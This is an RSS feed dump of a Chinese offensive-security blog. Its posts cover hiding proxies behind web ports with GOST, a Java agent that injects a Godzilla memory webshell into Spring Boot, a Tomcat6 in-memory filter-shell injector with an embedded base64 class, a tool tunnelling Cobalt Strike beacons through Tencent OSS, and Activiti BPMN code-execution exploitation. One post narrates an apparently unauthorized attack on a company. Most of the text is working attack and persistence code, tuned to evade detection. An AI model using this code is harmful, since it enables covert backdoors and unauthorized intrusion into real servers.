api.get_pricing(symbols, start_date='2013-01-03', end_date='2014-01-03', symbol_reference_date=None, frequency='daily', fields=None, handle_missing='raise')
Load a table of historical trade data.
Parameters:
• symbols (Object (or iterable of objects) convertible to Asset) – Valid input types are Asset, Integral, or basestring. In the case that the passed objects are strings, they are interpreted as ticker symbols and resolved relative to the date specified by symbol_reference_date.
• start_date (str or pd.Timestamp, optional) – String or Timestamp representing a start date for the returned data. Defaults to ‘2013-01-03’.
• end_date (str or pd.Timestamp, optional) – String or Timestamp representing an end date for the returned data. Defaults to ‘2014-01-03’.
• symbol_reference_date (str or pd.Timestamp, optional) – String or Timestamp representing a date used to resolve symbols that have been held by multiple companies. Defaults to the current time.
• frequency ({‘daily’, ‘minute’}, optional) – Resolution of the data to be returned.
• fields (str or list drawn from {‘price’, ‘open_price’, ‘high’, ‘low’, ‘close_price’, ‘volume’}, optional) – Default behavior is to return all fields.
• handle_missing ({‘raise’, ‘log’, ‘ignore’}, optional) – String specifying how to handle unmatched securities. Defaults to ‘raise’.
Returns:
pandas Panel/DataFrame/Series – The pricing data that was requested. See note below.
Notes
If a list of symbols is provided, data is returned in the form of a pandas Panel object with the following indices:
items = fields
major_axis = TimeSeries (start_date -> end_date)
minor_axis = symbols
If a string is passed for the value of symbols and fields is None or a list of strings, data is returned as a DataFrame with a DatetimeIndex and columns given by the passed fields.
If a list of symbols is provided, and fields is a string, data is returned as a DataFrame with a DatetimeIndex and a columns given by the passed symbols.
If both parameters are passed as strings, data is returned as a Series.
api.symbols(symbols, symbol_reference_date=None, handle_missing='log')
Convert a string or a list of strings into Asset objects.
Parameters:
• symbols (String or iterable of strings.) – Passed strings are interpreted as ticker symbols and resolved relative to the date specified by symbol_reference_date.
• symbol_reference_date (str or pd.Timestamp, optional) – String or Timestamp representing a date used to resolve symbols that have been held by multiple companies. Defaults to the current time.
• handle_missing ({‘raise’, ‘log’, ‘ignore’}, optional) – String specifying how to handle unmatched securities. Defaults to ‘log’.
Returns:
list of Asset objects – The symbols that were requested.
api.local_csv(path, symbol_column=None, date_column=None, use_date_column_as_index=True, timezone='UTC', symbol_reference_date=None, **read_csv_kwargs)
Load a CSV from the /data directory.
Parameters:
• path (str) – Path of file to load, relative to /data.
• symbol_column (string, optional) – Column containing strings to convert to Asset objects.
• date_column (str, optional) – Column to parse as Datetime. Ignored if parse_dates is passed as an additional keyword argument.
• use_date_column_as_index (bool, optional) – If True and date_column is supplied, set it as the frame index.
• timezone (str or pytz.timezone object, optional) – Interpret date_column as this timezone.
• read_csv_kwargs (optional) – Extra parameters to forward to pandas.read_csv.
Returns:
pandas.DataFrame – DataFrame with data from the loaded file.
api.get_backtest(backtest_id)
Get the results of a backtest that was run on Quantopian.
Parameters:backtest_id (str) – The id of the backtest for which results should be returned.
Returns:BacktestResult – An object containing all the information stored by Quantopian about the performance of a given backtest run, as well as some additional metadata.
Notes
You can find the ID of a backtest in the URL of its full results page, which will be of the form:
https://www.quantopian.com/algorithms/<algorithm_id>/<backtest_id>
api.get_fundamentals(query, base_date, range_specifier=None, filter_ordered_nulls=None)
Load a table of historical fundamentals data.
Parameters:
• query (SQLAlchemy Query object) – An SQLAlchemy Query representing the fundamentals data desired. Full documentation of the available fields for use in the query function can be found at http://quantopian.com/help/fundamentals
• base_date (str in the format “YYYY-MM-DD”) – Represents the date on which data is to be queried.
• range_specifier (str in the format {number}{One of ‘m’, ‘d’, ‘y’, ‘w’, ‘q’}, optional) – Represents the interval at which to query data. For example, a base_date of “2014-01-01” with a range_specifier of “4y” will return 4 data values at yearly intervals, from 2014-01-01 going backwards.
• filter_ordered_nulls (bool, optional) – When True, if you are sorting the query results via an order_by method, any row with a NULL value in the sorted column will be filtered out. Setting to False overrides this behavior and provides you with rows with a NULL value for the sorted column.
Returns:
pandas.Panel – A Pandas panel containing the requested fundamentals data.
Notes
Before calling get_fundamentals, you first need to call the fundamentals initializer once with:
fundamentals = init_fundamentals()
This function needs to be called only once, following which get_fundamentals can be used as normal.
Querying of quarterly data is still under development and may sometimes return inaccurate values.
|
__label__pos
| 0.620616 |
Have a Question?
How to add, delete, or rename a Notebook in Yahoo Notepad?
Thursday, 25 July 107 Views Computers & Internet
Thread Reply
Correct Answer
Thursday, 25 July
Add, delete or rename a notebook in Yahoo notebook
Organize your notes by placing them in notebooks where they are easy to locate. Think of notebooks as folders where you can save notes. Create multiple notebooks to separate different facets of your life, such as recipes, trips, letters, and to-do lists.
Add a notebook
1. From Yahoo Mail, click on the Notepad icon.
2. In the left column, click New notebook.
3. Enter the name of your notebook.
4. Press Enter
Delete a notebook
1. From Yahoo Mail, click on the Notepad icon.
2. Right click on the title of a notebook in the left column.
3. Click Delete notebook.
4. Click Delete
Rename a notebook
1. From Yahoo Mail, click on the Notepad icon.
2. Right click on the title of a notebook in the left column.
3. Click Rename Notebook.
4. Update the name of your notebook.
5. Press Enter
0 Likes
1 Answers
Note: Don’t post duplicate content otherwise your account will be suspended.
Post Your Answer
|
__label__pos
| 0.993408 |
Hosts file clarification wanted please
I am in the process of trying to setup a DigitalOcean Droplet running Linux Ubuntu 14.04,Apache2 Php, MySql…
I have managed to create in “/etc/Apache2/sites-available/test.com.conf” and similar for example.com (and also a my real sites which are in the process of being propagated).
I read somewhere that the following Linux Mint command can be used to access the Droplets
sudo nano /etc/hosts
# **localhost** works OK in my browser and call show the relevant Droplet Virtual Host
127.0.0.1 localhost
# both these work OK in my browser
123.45.67.89 test.com
123.45.67.89 example.com
**My question:** If I supply the actual DNS Record name to someone else can they access my Droplet?
edit:
I hope I have used the correct names, etc, if not please highlight the mistakes.
Yes provided that it is a public address available to anyone. There are a few ranges that are defined as private to the local network so if you provide one of those it will only work if they are on your local network.
1 Like
This topic was automatically closed 91 days after the last reply. New replies are no longer allowed.
|
__label__pos
| 0.876711 |
User Guide
LLM observability is complete visibility into every layer of an LLM-based software system: the application, the prompt, and the response.
Phoenix is a comprehensive platform designed to enable observability across every layer of an LLM-based system, empowering teams to build, optimize, and maintain high-quality applications efficiently.
Develop
During the development phase, Phoenix offers essential tools for debugging, prompt tracking, and search and retrieval optimization.
Traces for Debugging
Phoenix's tracing and span analysis capabilities are invaluable during the prototyping and debugging stages. By instrumenting application code with Phoenix, teams gain detailed insights into the execution flow, making it easier to identify and resolve issues. Developers can drill down into specific spans, analyze performance metrics, and access relevant logs and metadata to streamline debugging efforts.
Prompt Tracking
Leverage experiments to track prompt performance, and evaluate the outputs, Phoenix also tracks prompt templates, variables, and versions during execution to help you identify improvements and degradations.
Search & Retrieval Embeddings Visualizer
Phoenix's search and retrieval optimization tools include an embeddings visualizer that helps teams understand how their data is being represented and clustered. This visual insight can guide decisions on indexing strategies, similarity measures, and data organization to improve the relevance and efficiency of search results.
Testing/Staging
In the testing and staging environment, Phoenix supports comprehensive evaluation, benchmarking, and data curation. Traces, prompt tracking, and embedding visualizer remain important in the testing and staging phase, helping teams identify and resolve issues before deployment.
Benchmarking of Evals
Phoenix allows teams to benchmark their evaluation metrics against industry standards or custom baselines. This helps ensure that the LLM application meets performance and quality targets before moving into production.
Evals Testing
Phoenix's flexible evaluation framework supports thorough testing of LLM outputs. Teams can define custom metrics, collect user feedback, and leverage separate LLMs for automated assessment. Phoenix offers tools for analyzing evaluation results, identifying trends, and tracking improvements over time.
Curate Data
Phoenix assists in curating high-quality data for testing and fine-tuning. It provides tools for data exploration, cleaning, and labeling, enabling teams to curate representative data that covers a wide range of use cases and edge conditions.
Production
In production, Phoenix works hand-in-hand with Arize, which focuses on the production side of the LLM lifecycle. The integration ensures a smooth transition from development to production, with consistent tooling and metrics across both platforms.
Traces in Production
Phoenix and Arize use the same collector frameworks in development and production. This allows teams to monitor latency, token usage, and other performance metrics, setting up alerts when thresholds are exceeded.
Evals for Production
Phoenix's evaluation framework can be used to generate ongoing assessments of LLM performance in production. Arize complements this with online evaluations, enabling teams to set up alerts if evaluation metrics, such as hallucination rates, go beyond acceptable thresholds.
Fine-tuning
Phoenix and Arize together help teams identify data points for fine-tuning based on production performance and user feedback. This targeted approach ensures that fine-tuning efforts are directed towards the most impactful areas, maximizing the return on investment.
Phoenix, in collaboration with Arize, empowers teams to build, optimize, and maintain high-quality LLM applications throughout the entire lifecycle. By providing a comprehensive observability platform and seamless integration with production monitoring tools, Phoenix and Arize enable teams to deliver exceptional LLM-driven experiences with confidence and efficiency.
Last updated
|
__label__pos
| 0.666526 |
How to create websites with standard SEO articles
Currently there are many shop owners, businesses create their own website to serve the onl business purpose effectively. So you know how to create websites with SEO standard posts or not? The following article will share with you some of the above issues.
Google in general or search engines in particular are preeminent devices that process information at high speeds, and in large volumes. Therefore, if you cannot meet certain criteria. For example, if your website needs to develop standard SEO articles to improve the ranking of the page, that machine will not be able to show impressions to your website.
The result is so that your product will not reach close to the customer. This can be said as the first and very important approach for customers to find you, choose your products and bring you revenue!
Kết quả hình ảnh cho SEO
Based on market research or simply your observations of consumer needs in society, first build your website with an effective set of keywords to meet your tastes. line. This is extremely simple, but requires the ability and sharp thinking with society such as website construction, website costs, effective sales, … are all keywords you can build into one. framework for standard SEO articles coming here.
This is the first part to attract readers to find your article! With a clear title, hitting the user’s existing needs will help you score points right from the first moment. Also note that the number of words in the title should not be too long nor too short.
Kết quả hình ảnh cho SEO
Your title should contain the keywords you have built above because this will be the core that customers search for on the information you provide.
In addition, you can use some strong exclamations for the article title to add curiosity to the reader, but of course it shouldn’t be too jerky. Sometimes it will cause an objection, counterproductive for everyone.
Some steps to write SEO standard for website quickly on TOP
In order for your website to have a lot of access, especially access from search engines, your customers also have more useful information from you. Therefore, the article must not only have useful content but also SEO Standard.
Identify topics that potential customers care about:
On the topic of the website, you have to determine beforehand. For example, if your website talks about fashion, your topic is fashion. But the topic of the article here means what is the specific cabinet about? For example, the most beautiful women ‘s fashion sets in Winter, or the Winter Men’ s fashion trend, …
Identify target keywords:
After you have seen the topic of interest, you need to type that topic with the most relevant keyword into the Google Keyword Planner tool to see that keyword and other related keywords. You must know which words are being typed more and how competitive they are. You choose a keyword that has a lot of access with moderate or low competition.
Determine the type of article:
Determining the type of article will affect your content editorial direction. There are many formats to write, you can write product reviews, compare products, list or even comment on a certain topic. You can also determine to whom your writing goals are written. Write for what purpose? Article sales or article reference information, or article sharing knowledge … And do not forget to consider whether the article is useful to readers? Do readers like the content that you write?
Build article structure:
There are many ways to start writing, but if you write without an outline, it may make your article rambling and not specific. To avoid this error, you need to build the structure for the article. Determining the outline of your article will also help you increase your productivity, and increase your ability to evaluate Google content because Google Bots will understand the main ideas in your lesson.
|
__label__pos
| 0.594507 |
A properly documented software
A structure during maintenance. This can save valuable time and resources as developers better understand how to solve problems and add new features without compromising system stability and consistency. Regulatory Compliance. Some industries may require software architecture to be documented according to specific rules or standards. By maintaining a well-documented architecture, organizations can ensure compliance with industry regulations and reduce the risk of potential legal issues. Documenting Software Architecture Key Elements of an Effective Software Architecture Document To create an effective software architecture document that accurately captures the essence of the system and provides valuable information to stakeholders, consider including the following key elements: Context or system scope: Start the documentation by describing the scope of the system and setting the context.
Describe the purpose of the system
Its users and the environment in which it will operate. This helps set the stage for a better understanding of the overall architecture of Algeria Mobile Database the system and creates a common ground for all parties involved in the project. Architectural goals and limitations. Clearly state the goals and constraints that influenced the architectural decisions for the system. This includes consideration of functional and non-functional requirements, as well as any specific constraints or constraints imposed by the environment, organization, or technology stack. Establishing goals and constraints will provide justification for the selected architectural patterns, components, and design decisions.
Phone Number List
Architectural Views and Perspective
Represent the architecture of a system using multiple views such as logical, physical, process, or use case views to display different aspects of the system and its components. Each view should focus on a certain aspect of the architecture and WS Numbers provide a concise and consistent view of it. Moreover, include architectural aspects that discuss cross-cutting issues such as security, performance, or scalability. Component diagrams. Include diagrams illustrating the main components and their relationships within the system. These diagrams can range from high level abstract representations to more detailed and specific visualizations. Be sure to use clear, consistent notation and terminology to avoid confusion or misinterpretation.
About the Author
Leave a Reply
Your email address will not be published. Required fields are marked *
You may also like these
|
__label__pos
| 0.962431 |
Version: 2.0.40 2.2.26 2.4.37 3.0 3.1 3.2 3.3 3.4 3.5 3.6 3.7 3.8 3.9 3.10 3.11 3.12 3.13 3.14 3.15 3.16
Linux/arch/powerpc/platforms/83xx/mcu_mpc8349emitx.c
1 /*
2 * Power Management and GPIO expander driver for MPC8349E-mITX-compatible MCU
3 *
4 * Copyright (c) 2008 MontaVista Software, Inc.
5 *
6 * Author: Anton Vorontsov <[email protected]>
7 *
8 * This program is free software; you can redistribute it and/or modify
9 * it under the terms of the GNU General Public License as published by
10 * the Free Software Foundation; either version 2 of the License, or
11 * (at your option) any later version.
12 */
13
14 #include <linux/kernel.h>
15 #include <linux/module.h>
16 #include <linux/device.h>
17 #include <linux/mutex.h>
18 #include <linux/i2c.h>
19 #include <linux/gpio.h>
20 #include <linux/of.h>
21 #include <linux/of_gpio.h>
22 #include <linux/slab.h>
23 #include <linux/kthread.h>
24 #include <linux/reboot.h>
25 #include <asm/prom.h>
26 #include <asm/machdep.h>
27
28 /*
29 * I don't have specifications for the MCU firmware, I found this register
30 * and bits positions by the trial&error method.
31 */
32 #define MCU_REG_CTRL 0x20
33 #define MCU_CTRL_POFF 0x40
34 #define MCU_CTRL_BTN 0x80
35
36 #define MCU_NUM_GPIO 2
37
38 struct mcu {
39 struct mutex lock;
40 struct i2c_client *client;
41 struct gpio_chip gc;
42 u8 reg_ctrl;
43 };
44
45 static struct mcu *glob_mcu;
46
47 struct task_struct *shutdown_thread;
48 static int shutdown_thread_fn(void *data)
49 {
50 int ret;
51 struct mcu *mcu = glob_mcu;
52
53 while (!kthread_should_stop()) {
54 ret = i2c_smbus_read_byte_data(mcu->client, MCU_REG_CTRL);
55 if (ret < 0)
56 pr_err("MCU status reg read failed.\n");
57 mcu->reg_ctrl = ret;
58
59
60 if (mcu->reg_ctrl & MCU_CTRL_BTN) {
61 i2c_smbus_write_byte_data(mcu->client, MCU_REG_CTRL,
62 mcu->reg_ctrl & ~MCU_CTRL_BTN);
63
64 ctrl_alt_del();
65 }
66
67 set_current_state(TASK_INTERRUPTIBLE);
68 schedule_timeout(HZ);
69 }
70
71 return 0;
72 }
73
74 static ssize_t show_status(struct device *d,
75 struct device_attribute *attr, char *buf)
76 {
77 int ret;
78 struct mcu *mcu = glob_mcu;
79
80 ret = i2c_smbus_read_byte_data(mcu->client, MCU_REG_CTRL);
81 if (ret < 0)
82 return -ENODEV;
83 mcu->reg_ctrl = ret;
84
85 return sprintf(buf, "%02x\n", ret);
86 }
87 static DEVICE_ATTR(status, S_IRUGO, show_status, NULL);
88
89 static void mcu_power_off(void)
90 {
91 struct mcu *mcu = glob_mcu;
92
93 pr_info("Sending power-off request to the MCU...\n");
94 mutex_lock(&mcu->lock);
95 i2c_smbus_write_byte_data(mcu->client, MCU_REG_CTRL,
96 mcu->reg_ctrl | MCU_CTRL_POFF);
97 mutex_unlock(&mcu->lock);
98 }
99
100 static void mcu_gpio_set(struct gpio_chip *gc, unsigned int gpio, int val)
101 {
102 struct mcu *mcu = container_of(gc, struct mcu, gc);
103 u8 bit = 1 << (4 + gpio);
104
105 mutex_lock(&mcu->lock);
106 if (val)
107 mcu->reg_ctrl &= ~bit;
108 else
109 mcu->reg_ctrl |= bit;
110
111 i2c_smbus_write_byte_data(mcu->client, MCU_REG_CTRL, mcu->reg_ctrl);
112 mutex_unlock(&mcu->lock);
113 }
114
115 static int mcu_gpio_dir_out(struct gpio_chip *gc, unsigned int gpio, int val)
116 {
117 mcu_gpio_set(gc, gpio, val);
118 return 0;
119 }
120
121 static int mcu_gpiochip_add(struct mcu *mcu)
122 {
123 struct device_node *np;
124 struct gpio_chip *gc = &mcu->gc;
125
126 np = of_find_compatible_node(NULL, NULL, "fsl,mcu-mpc8349emitx");
127 if (!np)
128 return -ENODEV;
129
130 gc->owner = THIS_MODULE;
131 gc->label = np->full_name;
132 gc->can_sleep = 1;
133 gc->ngpio = MCU_NUM_GPIO;
134 gc->base = -1;
135 gc->set = mcu_gpio_set;
136 gc->direction_output = mcu_gpio_dir_out;
137 gc->of_node = np;
138
139 return gpiochip_add(gc);
140 }
141
142 static int mcu_gpiochip_remove(struct mcu *mcu)
143 {
144 return gpiochip_remove(&mcu->gc);
145 }
146
147 static int mcu_probe(struct i2c_client *client, const struct i2c_device_id *id)
148 {
149 struct mcu *mcu;
150 int ret;
151
152 mcu = kzalloc(sizeof(*mcu), GFP_KERNEL);
153 if (!mcu)
154 return -ENOMEM;
155
156 mutex_init(&mcu->lock);
157 mcu->client = client;
158 i2c_set_clientdata(client, mcu);
159
160 ret = i2c_smbus_read_byte_data(mcu->client, MCU_REG_CTRL);
161 if (ret < 0)
162 goto err;
163 mcu->reg_ctrl = ret;
164
165 ret = mcu_gpiochip_add(mcu);
166 if (ret)
167 goto err;
168
169 /* XXX: this is potentially racy, but there is no lock for ppc_md */
170 if (!ppc_md.power_off) {
171 glob_mcu = mcu;
172 ppc_md.power_off = mcu_power_off;
173 dev_info(&client->dev, "will provide power-off service\n");
174 }
175
176 if (device_create_file(&client->dev, &dev_attr_status))
177 dev_err(&client->dev,
178 "couldn't create device file for status\n");
179
180 shutdown_thread = kthread_run(shutdown_thread_fn, NULL,
181 "mcu-i2c-shdn");
182
183 return 0;
184 err:
185 kfree(mcu);
186 return ret;
187 }
188
189 static int mcu_remove(struct i2c_client *client)
190 {
191 struct mcu *mcu = i2c_get_clientdata(client);
192 int ret;
193
194 kthread_stop(shutdown_thread);
195
196 device_remove_file(&client->dev, &dev_attr_status);
197
198 if (glob_mcu == mcu) {
199 ppc_md.power_off = NULL;
200 glob_mcu = NULL;
201 }
202
203 ret = mcu_gpiochip_remove(mcu);
204 if (ret)
205 return ret;
206 kfree(mcu);
207 return 0;
208 }
209
210 static const struct i2c_device_id mcu_ids[] = {
211 { "mcu-mpc8349emitx", },
212 {},
213 };
214 MODULE_DEVICE_TABLE(i2c, mcu_ids);
215
216 static struct of_device_id mcu_of_match_table[] = {
217 { .compatible = "fsl,mcu-mpc8349emitx", },
218 { },
219 };
220
221 static struct i2c_driver mcu_driver = {
222 .driver = {
223 .name = "mcu-mpc8349emitx",
224 .owner = THIS_MODULE,
225 .of_match_table = mcu_of_match_table,
226 },
227 .probe = mcu_probe,
228 .remove = mcu_remove,
229 .id_table = mcu_ids,
230 };
231
232 module_i2c_driver(mcu_driver);
233
234 MODULE_DESCRIPTION("Power Management and GPIO expander driver for "
235 "MPC8349E-mITX-compatible MCU");
236 MODULE_AUTHOR("Anton Vorontsov <[email protected]>");
237 MODULE_LICENSE("GPL");
238
This page was automatically generated by LXR 0.3.1 (source). • Linux is a registered trademark of Linus Torvalds • Contact us
|
__label__pos
| 0.982369 |
Example #1
0
func (srv *Server) get(c *gin.Context) {
key := c.Param("key")
if res, err := srv.keystorage.Get(key); err == nil {
obj := model.NewOvoKVResponse(res)
result := model.NewOvoResponse("done", "0", obj)
c.JSON(http.StatusOK, result)
} else {
c.JSON(http.StatusNotFound, model.NewOvoResponse("error", "101", nil))
}
}
Example #2
0
func (srv *Server) getAndRemove(c *gin.Context) {
key := c.Param("key")
if res, err := srv.keystorage.GetAndRemove(key); err == nil {
obj := model.NewOvoKVResponse(res)
srv.outcmdproc.Enqueu(&command.Command{OpCode: "delete", Obj: &storage.MetaDataUpdObj{Key: key}})
result := model.NewOvoResponse("done", "0", obj)
c.JSON(http.StatusOK, result)
} else {
c.JSON(http.StatusNotFound, model.NewOvoResponse("error", "101", nil))
}
}
|
__label__pos
| 0.99983 |
Maximum level sum in a binary tree
Category: Data Structures
Tags: #datastructures#tree#binary-tree
Write a program to find the maximum level sum in a binary tree even if nodes may have negative values also. To find the maximum level sum, traverse each level separately and find the sum of each level.
Deepest node in a tree
Maximum level sum in a tree
A tree has different levels, among those levels we have to identify the level having the maximum sum of nodes of elements. Nodes may also have negative values
Deepest node in a tree example
To find the maximum level sum in a binary tree we have to traverse the tree in level order and consider each level separately then compare the sum of each level.
Example -
Input:
1
/ \
2 3
/ \ / \
4 5 6 7
Output: 2
Solution
For the solution, we have to traverse each node and this can be achieved by using level order traversal and maintain the sum of each level separately and keep comparing with the previous level of the tree having maximum sum.
Algorithm
Max_Level_Sum(root)
1. if root is not null
2. queue.enqueue(root)
3. queue.enqueue(null)
4. node = null
5. level = max_level = current_sum = max_sum = 0
6. while queue is not empty
7. node = q.dequeue()
8. if node is null then
9. if current_sum > max_sum then
10. max_sum = current_sum
11. max_level = level
12. current_sum = 0
13. if queue is not empty
14. level = level + 1
15. queue.enqueue(null)
16. else
17. current_sum = current_sum + node.data
18. if node.left is not null
19. queue.enqueue(node.left)
20. if node.right is not null
21. queue.enqueue(node.right)
22. return max_level
23. else
24. return null
Python
import queue
class Node:
def __init__(self, data):
self.left = None
self.data = data
self.right = None
def max_level_sum(root):
if root:
q = queue.Queue()
q.put(root)
q.put(None)
node = None
level = max_level = current_sum = max_sum = 0
while not q.empty():
node = q.get()
if node is None:
if current_sum > max_sum:
max_sum = current_sum
max_level = level
current_sum = 0
if not q.empty():
level += 1
q.put(None)
else:
current_sum += node.data
if node.left:
q.put(node.left)
if node.right:
q.put(node.right)
return max_level
else:
return None
root = Node(1)
root.left = Node(2)
root.right = Node(3)
root.left.left = Node(4)
root.left.right = Node(5)
root.right.left = Node(6)
root.right.right = Node(7)
print(max_level_sum(root))
JavaScript
class Node {
constructor(data) {
this.left = null;
this.data = data;
this.right = null;
}
}
function maxLevelSum(root) {
if (root) {
const q = [];
q.push(root);
q.push(null);
node = null;
let level, max_level, current_sum, max_sum;
level = max_level = current_sum = max_sum = 0;
while (q.length > 0) {
node = q.shift();
if (node == null) {
if (current_sum > max_sum) {
max_sum = current_sum;
max_level = level;
}
current_sum = 0;
if (q.length > 0) {
level++;
q.push(null);
}
} else {
current_sum += node.data;
if (node.left) q.push(node.left);
if (node.right) q.push(node.right);
}
}
return max_level;
} else {
return null;
}
}
const root = new Node(1);
root.left = new Node(2);
root.right = new Node(3);
root.left.left = new Node(4);
root.left.right = new Node(5);
root.right.left = new Node(6);
root.right.right = new Node(7);
console.log(maxLevelSum(root));
Output
2
Here, we have returned the level having maximum sum but if the sum value is required then return variable max_sum from the function.
Time complexity: The time complexity of this solution is O(n) because we are just traversing each element of node one by one.
|
__label__pos
| 0.999941 |
global _start section .data buffer dw 0h section .text _start: mov ecx, buffer mov edx, 02h call read mov cx, word [buffer] cmp cx, 3234h je exit cmp ch, 0ah je one_dig jmp two_dig one_dig: mov ecx, buffer mov edx, 02h call write jmp _start two_dig: mov ecx, buffer mov edx, 02h call write mov edx, 01h mov ecx, buffer call read ; read the 0ah mov ecx, buffer call write ; write the 0ah jmp _start exit: mov eax, 01h ; exit() xor ebx, ebx ; errno int 80h read: mov eax, 03h ; read() mov ebx, 00h ; stdin int 80h ret write: mov eax, 04h ; write() mov ebx, 01h ; stdout int 80h ret
|
__label__pos
| 0.877322 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.